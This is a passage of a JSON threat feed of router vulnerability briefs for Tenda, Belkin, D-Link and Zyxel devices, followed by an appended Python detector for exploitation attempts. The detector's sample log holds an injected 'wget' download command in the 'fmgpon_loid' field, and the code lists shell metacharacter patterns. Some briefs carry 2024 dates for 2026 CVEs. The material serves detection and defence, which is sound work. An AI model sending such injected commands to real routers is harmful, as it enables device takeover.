service. An attacker with administrative privileges can inject arbitrary OS commands by manipulating the input to this function. 
The vulnerability can be exploited remotely, allowing a threat actor to potentially gain…\u003c/p\u003e\n","date_modified":"2026-03-24T05:16:24Z","date_published":"2026-03-24T05:16:24Z","id":"/briefs/2026-03-dlink-command-injection/","summary":"CVE-2026-4627 is an OS command injection vulnerability in the handler_update_system_time function of the libdeuteron_modules.so file in the NTP Service component of D-Link DIR-825 and DIR-825R devices, which can be exploited remotely by authenticated attackers.","title":"D-Link DIR-825/825R OS Command Injection Vulnerability (CVE-2026-4627)","url":"https://feed.craftedsignal.io/briefs/2026-03-dlink-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4553","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, tracked as CVE-2026-4553, has been identified in Tenda F453 version 1.0.0.3. The flaw resides within the \u003ccode\u003efromNatlimit\u003c/code\u003e function of the \u003ccode\u003e/goform/Natlimit\u003c/code\u003e component\u0026rsquo;s Parameters Handler. Publicly available exploits exist, increasing the risk of exploitation. Successful exploitation could allow an attacker to execute arbitrary code on the affected device. 
This vulnerability poses a significant threat to users of the Tenda F453 router, potentially…\u003c/p\u003e\n","date_modified":"2026-03-23T12:00:00Z","date_published":"2026-03-23T12:00:00Z","id":"/briefs/2026-03-tenda-stack-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Tenda F453 version 1.0.0.3 in the fromNatlimit function of the /goform/Natlimit Parameters Handler component, triggered remotely by manipulating the 'page' argument, allowing for potential arbitrary code execution.","title":"Tenda F453 Router Stack-Based Buffer Overflow Vulnerability (CVE-2026-4553)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-stack-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4567","stack-based buffer overflow","tenda","router","remote code execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-4567, has been discovered in Tenda A15 wireless routers running firmware version 15.13.07.13. The vulnerability resides in the \u003ccode\u003eUploadCfg\u003c/code\u003e function within the \u003ccode\u003e/cgi-bin/UploadCfg\u003c/code\u003e file, which handles file uploads.  
A remote attacker can exploit this flaw by crafting a malicious request to the router, specifically targeting the \u003ccode\u003eFile\u003c/code\u003e argument, to overwrite the stack buffer and potentially gain arbitrary code execution…\u003c/p\u003e\n","date_modified":"2026-03-23T03:16:00Z","date_published":"2026-03-23T03:16:00Z","id":"/briefs/2026-03-tenda-a15-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-4567) exists in the UploadCfg function of the /cgi-bin/UploadCfg file in Tenda A15 firmware version 15.13.07.13, allowing remote attackers to execute arbitrary code by manipulating the File argument.","title":"Tenda A15 Router Stack-Based Buffer Overflow (CVE-2026-4567)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-a15-bo/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4566","buffer-overflow","router","rce"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been discovered in the Belkin F9K1122 router, specifically version 1.00.33. The vulnerability resides within the \u003ccode\u003eformWISP5G\u003c/code\u003e function located in the \u003ccode\u003e/goform/formWISP5G\u003c/code\u003e file. Successful exploitation involves manipulating the \u003ccode\u003ewebpage\u003c/code\u003e argument, leading to arbitrary code execution. This vulnerability is remotely exploitable, making it a significant threat. Publicly available exploit code exists, increasing the likelihood of exploitation. The vendor was notified but has not responded, indicating a lack of timely patching. 
This poses a high risk to users of the affected Belkin router model.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Belkin F9K1122 router running firmware version 1.00.33.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/formWISP5G\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the HTTP request, the \u003ccode\u003ewebpage\u003c/code\u003e argument is manipulated to contain a payload exceeding the buffer size.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s web server processes the request and passes the attacker-controlled input to the \u003ccode\u003eformWISP5G\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformWISP5G\u003c/code\u003e function attempts to copy the oversized \u003ccode\u003ewebpage\u003c/code\u003e argument into a fixed-size buffer on the stack.\u003c/li\u003e\n\u003cli\u003eA stack-based buffer overflow occurs, overwriting adjacent memory regions, including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow by redirecting it to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining complete control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the Belkin F9K1122 router. This can lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the router as a pivot point for further attacks within the network. Given the wide use of these routers in home and small business environments, a successful widespread attack could impact thousands of users. 
The absence of a vendor patch exacerbates the risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement a web application firewall (WAF) rule to detect and block requests with excessively long \u003ccode\u003ewebpage\u003c/code\u003e arguments to the \u003ccode\u003e/goform/formWISP5G\u003c/code\u003e endpoint, mitigating exploitation attempts (Attack Chain step 3).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided to detect suspicious web requests targeting the vulnerable endpoint (see \u0026ldquo;Belkin Router RCE Attempt\u0026rdquo; rule).\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual activity related to the \u003ccode\u003e/goform/formWISP5G\u003c/code\u003e endpoint (Attack Chain step 4).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T03:16:00Z","date_published":"2026-03-23T03:16:00Z","id":"/briefs/2026-03-belkin-rce/","summary":"A stack-based buffer overflow vulnerability exists in Belkin F9K1122 version 1.00.33, allowing remote attackers to execute arbitrary code by manipulating the 'webpage' argument in the 'formWISP5G' function.","title":"Belkin F9K1122 Router Stack-Based Buffer Overflow","url":"https://feed.craftedsignal.io/briefs/2026-03-belkin-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","ac21","buffer_overflow","cve-2026-4565","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, CVE-2026-4565, affects Tenda AC21 routers running firmware version 16.03.08.16. The flaw resides in the \u003ccode\u003eformSetQosBand\u003c/code\u003e function within the \u003ccode\u003e/goform/SetNetControlList\u003c/code\u003e file. Attackers can exploit this vulnerability by crafting malicious argument lists in HTTP requests, leading to arbitrary code execution on the device. 
The vulnerability can be exploited remotely and a proof-of-concept exploit is publicly available, increasing the risk of widespread exploitation. Successful exploitation allows attackers to gain complete control over the router, potentially compromising connected devices and network traffic.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda AC21 router with firmware version 16.03.08.16.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/SetNetControlList\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes a specially crafted argument list designed to overflow the buffer in the \u003ccode\u003eformSetQosBand\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe router processes the HTTP request and passes the malicious arguments to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformSetQosBand\u003c/code\u003e function attempts to copy the oversized argument list into a fixed-size buffer, triggering a buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites adjacent memory regions, potentially including critical program data or execution pointers.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow and redirects it to attacker-supplied code.\u003c/li\u003e\n\u003cli\u003eThat code runs with the privileges of the web server process, which on embedded routers is typically root, granting the attacker complete control over the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the Tenda AC21 router. 
This can lead to a variety of malicious outcomes, including complete device compromise, modification of router settings, interception of network traffic, deployment of malware to connected devices, and use of the router as a botnet node. Given the wide usage of Tenda routers in home and small business environments, a successful widespread exploit could impact thousands of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/SetNetControlList\u003c/code\u003e with unusually long or malformed arguments (see rule: \u0026ldquo;Detect Suspicious POST Requests to SetNetControlList\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eRate limiting on HTTP POST requests does not stop this attack, which needs only one request, but it slows repeated attempts, for example an attacker retrying addresses against an httpd that restarts after each crash; treat it as a secondary control.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda AC21 Buffer Overflow Attempt\u0026rdquo; to identify exploitation attempts based on specific patterns in HTTP requests.\u003c/li\u003e\n\u003cli\u003eConsider blocking traffic from known exploit sources, if available.\u003c/li\u003e\n\u003cli\u003eUpgrade to a patched firmware version as soon as it becomes available from the vendor.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T01:16:43Z","date_published":"2026-03-23T01:16:43Z","id":"/briefs/2026-03-tenda-ac21-buffer-overflow/","summary":"A buffer overflow vulnerability exists in Tenda AC21 firmware version 16.03.08.16, allowing remote attackers to execute arbitrary code by manipulating arguments to the formSetQosBand function.","title":"Tenda AC21 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac21-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["zyxel","router","command 
injection","cve-2026-13942","upnp"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical command injection vulnerability, tracked as CVE-2026-13942, has been discovered in the UPnP (Universal Plug and Play) service of Zyxel routers. The vulnerability stems from insufficient validation of input within the UPnP SOAP request processing. An unauthenticated, remote attacker can exploit this flaw by sending specially crafted UPnP SOAP requests to the affected device. This allows the attacker to inject and execute arbitrary operating system commands with elevated privileges on…\u003c/p\u003e\n","date_modified":"2026-02-27T12:00:00Z","date_published":"2026-02-27T12:00:00Z","id":"/briefs/2026-02-zyxel-rce/","summary":"A critical command injection vulnerability (CVE-2026-13942) in the UPnP function of Zyxel routers allows remote attackers to execute arbitrary operating system commands by sending crafted UPnP SOAP requests.","title":"Critical Command Injection Vulnerability in Zyxel Routers (CVE-2026-13942)","url":"https://feed.craftedsignal.io/briefs/2026-02-zyxel-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7096"}],"_cs_exploited":false,"_cs_products":["HG3 2.0 300003070"],"_cs_severities":["critical"],"_cs_tags":["command-injection","router","tenda"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical command injection vulnerability, identified as CVE-2026-7096, affects Tenda HG3 2.0 300003070 routers. The vulnerability resides in the \u0026lsquo;formgponConf\u0026rsquo; function, the handler for the \u0026lsquo;/boaform/admin/formgponConf\u0026rsquo; endpoint. An attacker can exploit this flaw by manipulating the \u0026lsquo;fmgpon_loid\u0026rsquo; argument. Successful exploitation allows a remote attacker to execute arbitrary operating system commands on the affected device. Given the public availability of an exploit, Tenda HG3 devices are at immediate risk of compromise. 
This poses a significant threat as attackers can potentially gain full control of the router, compromise connected networks, and exfiltrate sensitive information.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda HG3 2.0 300003070 router with an exposed web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u0026lsquo;/boaform/admin/formgponConf\u0026rsquo; endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker injects a payload containing OS commands into the \u0026lsquo;fmgpon_loid\u0026rsquo; parameter of the POST request.\u003c/li\u003e\n\u003cli\u003eThe Tenda HG3 router\u0026rsquo;s web server processes the request without proper input validation of the \u0026lsquo;fmgpon_loid\u0026rsquo; parameter.\u003c/li\u003e\n\u003cli\u003eThe injected OS command is executed by the router\u0026rsquo;s operating system with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution on the Tenda HG3 router.\u003c/li\u003e\n\u003cli\u003eThe attacker may establish a reverse shell to maintain persistent access or download further malicious payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker can then pivot to internal networks, exfiltrate data, or use the compromised router for other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7096 grants attackers the ability to execute arbitrary OS commands on the Tenda HG3 router. This can lead to complete compromise of the device, allowing attackers to modify router settings, intercept network traffic, and potentially gain access to connected devices on the local network. Given the widespread use of Tenda routers in home and small business environments, a successful attack could impact thousands of users. 
The vulnerability\u0026rsquo;s high CVSS score of 8.8 underscores the severity and potential for widespread damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda HG3 Command Injection Attempt\u0026rdquo; to your SIEM to identify exploitation attempts by monitoring HTTP POST requests to \u0026lsquo;/boaform/admin/formgponConf\u0026rsquo; with suspicious commands in the \u0026lsquo;fmgpon_loid\u0026rsquo; parameter.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (NIDS) rules to detect malicious payloads in HTTP POST requests targeting the vulnerable endpoint, as described in the \u0026ldquo;Attack Chain\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eWhile no specific IOCs are provided, analyze network traffic and web server logs for unusual activity originating from or targeting Tenda HG3 routers.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for HTTP POST requests to /boaform/admin/formgponConf (Attack Chain step 2), and in particular for \u0026lsquo;fmgpon_loid\u0026rsquo; values containing shell metacharacters such as \u003ccode\u003e;\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, \u003ccode\u003e\u0026amp;\u003c/code\u003e, backticks or \u003ccode\u003e$(\u003c/code\u003e, which a legitimate GPON LOID should never contain; the payload may arrive percent-encoded, so decode the parameter before matching.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-tenda-hg3-command-injection/","summary":"A command injection vulnerability (CVE-2026-7096) exists in the Tenda HG3 2.0 300003070 router, allowing remote attackers to execute arbitrary OS commands by manipulating the 'fmgpon_loid' argument in the 'formgponConf' function of the '/boaform/admin/formgponConf' file due to insufficient input validation.","title":"Tenda HG3 Router Command Injection Vulnerability (CVE-2026-7096)","url":"https://feed.craftedsignal.io/briefs/2024-01-tenda-hg3-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7034"}],"_cs_exploited":false,"_cs_products":["FH1202 
1.2.0.14(408)"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7034","buffer-overflow","router","tenda"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-7034, has been discovered in Tenda FH1202 version 1.2.0.14(408). The vulnerability resides within the \u003ccode\u003eWrlExtraSet\u003c/code\u003e function, the handler for the \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e endpoint, which is part of the device\u0026rsquo;s \u003ccode\u003ehttpd\u003c/code\u003e server. A remote attacker can exploit this vulnerability by crafting a malicious HTTP request that manipulates the \u003ccode\u003eGo\u003c/code\u003e argument, leading to arbitrary code execution on the affected device. The exploit for this vulnerability has been made public, increasing the risk of widespread exploitation. This vulnerability poses a significant threat to users of the Tenda FH1202 router as it allows for complete compromise of the device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda FH1202 router exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003eGo\u003c/code\u003e parameter with a payload exceeding the expected buffer size, triggering the stack-based buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites the function\u0026rsquo;s saved return address on the stack.\u003c/li\u003e\n\u003cli\u003eWhen the function returns, execution is redirected to attacker-supplied code placed in the overflowed buffer or, on a build with a non-executable stack, to a chain of existing code fragments (return-oriented programming).\u003c/li\u003e\n\u003cli\u003eThat code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eThe attacker 
gains complete control of the device, potentially allowing for the installation of malware, modification of router settings, or interception of network traffic.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to gain complete control of the Tenda FH1202 router. This can lead to a variety of malicious activities, including installing persistent backdoors, modifying DNS settings to redirect traffic, or using the compromised device as part of a botnet. The attack chain above assumes the handler is reachable without authentication, which would make exploitation trivial; note, however, that the recorded CVSS base score of 8.8 corresponds to a vector that requires either low-privileged access (PR:L) or user interaction (UI:R), so verify the authentication requirement against the CVE record before prioritising. While the exact number of affected devices is unknown, the widespread use of Tenda routers suggests a potentially large number of vulnerable targets.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e with unusually long \u003ccode\u003eGo\u003c/code\u003e parameter values to detect potential exploitation attempts. 
Reference the Sigma rule \u003ccode\u003eDetect Suspicious WrlExtraSet Requests\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRate limiting requests to the \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e endpoint limits how fast an attacker can retry (for example, when guessing addresses against an httpd that the watchdog restarts after each crash); it does not block a single well-formed exploit request, so it belongs alongside, not instead of, restricting who can reach the endpoint.\u003c/li\u003e\n\u003cli\u003eConsider blocking or alerting on requests to \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e originating from outside the expected user base (e.g., requests originating from outside the country where the organization operates).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-tenda-fh1202-bo/","summary":"A stack-based buffer overflow vulnerability exists in the Tenda FH1202 router, specifically in the WrlExtraSet function, allowing remote attackers to execute arbitrary code by manipulating the 'Go' argument in a request to /goform/WrlExtraSet.","title":"Tenda FH1202 Stack-Based Buffer Overflow Vulnerability (CVE-2026-7034)","url":"https://feed.craftedsignal.io/briefs/2024-01-tenda-fh1202-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7098"}],"_cs_exploited":false,"_cs_products":["F456"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7098","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-7098, has been discovered in Tenda F456 router version 1.0.0.5. The vulnerability resides in the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function, the handler for the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint of the device\u0026rsquo;s \u003ccode\u003ehttpd\u003c/code\u003e service. An attacker can exploit this flaw by remotely manipulating the \u003ccode\u003epage\u003c/code\u003e argument, leading to a buffer overflow. Publicly available exploit code exists, increasing the risk of widespread exploitation. 
Successful exploitation could allow an attacker to execute arbitrary code on the device, potentially gaining full control of the router and the network it serves. This poses a significant threat to home and small business users relying on these routers.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Tenda F456 router (version 1.0.0.5) accessible over the network.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003epage\u003c/code\u003e argument with a payload designed to overflow the buffer in the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e service processes the request and calls the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to insufficient bounds checking, the oversized payload overwrites the buffer, potentially overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s payload overwrites the return address on the stack with a pointer to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromDhcpListClient\u003c/code\u003e function returns, causing execution to jump to the attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e service, potentially allowing for full control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can allow a remote attacker to execute arbitrary code on the Tenda F456 router. 
This could lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the router as a pivot point for further attacks within the network. Given the ease of exploitation and public availability of exploit code, a large number of Tenda F456 users are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests to \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e with unusually long \u003ccode\u003epage\u003c/code\u003e parameters to detect potential exploitation attempts (see Sigma rule \u0026ldquo;Detect Tenda F456 Buffer Overflow Attempt\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on requests to the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint to slow repeated attempts; it does not stop a single successful request.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda F456 Buffer Overflow Response\u0026rdquo; to identify successful exploitation attempts based on server response codes, bearing in mind that a request which crashes or hijacks \u003ccode\u003ehttpd\u003c/code\u003e often produces no HTTP response at all: a connection reset or timeout immediately after a long \u003ccode\u003epage\u003c/code\u003e request, or an unexplained \u003ccode\u003ehttpd\u003c/code\u003e restart, is as strong a signal as any status code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-tenda-f456-buffer-overflow/","summary":"A remote buffer overflow vulnerability exists in Tenda F456 version 1.0.0.5 via manipulation of the 'page' argument in the fromDhcpListClient function of the /goform/DhcpListClient component, potentially leading to arbitrary code execution.","title":"Tenda F456 Remote Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-tenda-f456-buffer-overflow/"}],"language":"en","title":"CraftedSignal Threat Feed — Router","version":"https://jsonfeed.org/version/1.1"}
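Added example for the log-monitoring recommendations in the Belkin F9K1122, Tenda AC21, Tenda FH1202, Tenda F456 and Tenda HG3 briefs above. This is not CraftedSignal's Sigma rules or any vendor's code; it is a stand-alone Python detector that applies the two checks the briefs describe, an oversized value for the parameter named in each stack-overflow brief and shell metacharacters in fmgpon_loid for the command injection, over a constructed access-log format that records the URL-encoded request body. The log format, the sample lines, the 128-character length threshold and the benign parameter values are assumptions; only the endpoint paths and parameter names come from the briefs.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import parse_qs, unquote_plus

# Endpoint -> (parameter to check, abuse class). Endpoints and parameter names
# come from the briefs; None means every parameter is checked, because the
# Tenda AC21 brief names only a crafted "argument list".
RULES = {
    "/goform/formWISP5G": ("webpage", "overflow"),             # Belkin F9K1122
    "/goform/SetNetControlList": (None, "overflow"),           # Tenda AC21
    "/goform/WrlExtraSet": ("Go", "overflow"),                 # Tenda FH1202, CVE-2026-7034
    "/goform/DhcpListClient": ("page", "overflow"),            # Tenda F456, CVE-2026-7098
    "/boaform/admin/formgponConf": ("fmgpon_loid", "cmdinj"),  # Tenda HG3, CVE-2026-7096
}
MAX_LEN = 128  # assumption: legitimate values for these fields are far shorter than this
SHELL_META = re.compile(r"[;|&`\r\n]|\$\(|\$\{")  # command separators and substitution

# Constructed log format (not any vendor's):
#   <src> "<METHOD> <path>[?<qs>] HTTP/1.x" <status|-> body=<urlencoded body>
LOG_RE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>[^ ?"]+)(?:\?(?P<qs>[^ "]*))? HTTP/1\.[01]" '
    r'(?P<status>\d{3}|-) body=(?P<body>.*)$'
)


@dataclass
class Alert:
    src: str
    path: str
    param: str
    reason: str
    no_response: bool  # status "-": the server never answered, consistent with a crashed httpd


def inspect(line: str) -> Optional[Alert]:
    """Return an Alert if one log line matches an exploitation pattern, else None."""
    m = LOG_RE.match(line)
    if m is None or m["path"] not in RULES:
        return None
    want, kind = RULES[m["path"]]
    # Query string first, then body, so a body parameter of the same name wins.
    params = parse_qs(m["qs"] or "", keep_blank_values=True)
    params.update(parse_qs(m["body"] or "", keep_blank_values=True))
    no_response = m["status"] == "-"
    for name, values in params.items():
        if want is not None and name != want:
            continue
        for raw in values:
            # parse_qs removed one layer of percent-encoding; remove one more so a
            # double-encoded payload (%2541 -> %41 -> A) is measured as httpd would see it.
            value = unquote_plus(raw)
            if kind == "overflow" and len(value) > MAX_LEN:
                return Alert(m["src"], m["path"], name,
                             f"{name} is {len(value)} characters (limit {MAX_LEN})", no_response)
            if kind == "cmdinj" and SHELL_META.search(value):
                return Alert(m["src"], m["path"], name,
                             f"shell metacharacter in {value[:40]!r}", no_response)
    return None


def scan(lines: Iterable[str]) -> List[Alert]:
    """Run inspect() over a log and keep the hits."""
    return [a for a in map(inspect, lines) if a is not None]


# Constructed sample traffic: three benign requests and three exploitation attempts.
SAMPLE_LOG = [
    '10.0.0.7 "POST /goform/formWISP5G HTTP/1.1" 200 body=webpage=wisp5g.asp&wan_mode=wisp',
    '10.0.0.9 "POST /goform/formWISP5G HTTP/1.1" - body=webpage=' + "A" * 600,
    '203.0.113.5 "POST /boaform/admin/formgponConf HTTP/1.1" 200 body=fmgpon_loid=user01',
    '203.0.113.5 "POST /boaform/admin/formgponConf HTTP/1.1" 200 '
    'body=fmgpon_loid=user01%3Bwget+http%3A%2F%2F203.0.113.5%2Fx+-O+%2Ftmp%2Fx',
    '198.51.100.2 "POST /goform/WrlExtraSet HTTP/1.1" - body=Go=' + "%2541" * 300,
    '192.0.2.10 "GET /index.html HTTP/1.1" 200 body=',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        flag = " (no response: httpd may have crashed)" if alert.no_response else ""
        print(f"{alert.src} {alert.path} {alert.param}: {alert.reason}{flag}")
```

Run directly, it prints the three hits from the sample log. The no_response flag records a request that got no HTTP status at all; paired with a long-parameter hit it is the closest thing to evidence of a crashed httpd that a web log can offer, which is why the response-code rules in the briefs should not be relied on alone. Tune MAX_LEN to what the affected firmware actually accepts before deploying, and note that the decode step matters: the FH1202 sample line is double percent-encoded and would still be caught on raw length here, but a payload padded just under the threshold would not be.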